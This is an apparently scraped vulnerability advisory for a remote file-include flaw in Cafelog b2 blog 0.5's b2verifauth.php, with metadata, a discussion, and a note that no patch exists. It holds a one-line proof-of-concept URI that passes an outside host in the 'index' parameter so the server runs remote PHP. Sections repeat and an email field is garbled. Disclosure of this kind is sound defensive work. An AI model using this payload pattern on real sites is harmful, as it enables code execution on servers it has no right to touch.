Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
BID:21749
Info
Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
| Bugtraq ID: | 21749 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2006 12:00AM |
| Updated: | Jan 02 2007 09:46PM |
| Credit: | mdx is credited with the discovery of this vulnerability. |
| Vulnerable: |
Cafelog b2 blog 0.5 |
| Not Vulnerable: | |
Discussion
Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
The 'b2 blog' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
Version 0.5 and prior are vulnerable to this issue.
The 'b2 blog' program is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
Version 0.5 and prior are vulnerable to this issue.
Exploit / POC
Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.site.com/b2verifauth.php?index=http://www.example2.com
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.site.com/b2verifauth.php?index=http://www.example2.com
Solution / Fix
Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Cafelog B2 Blog B2Verifauth.PHP Remote File Include Vulnerability
References:
References:
- b2 blog home page (Cafelog)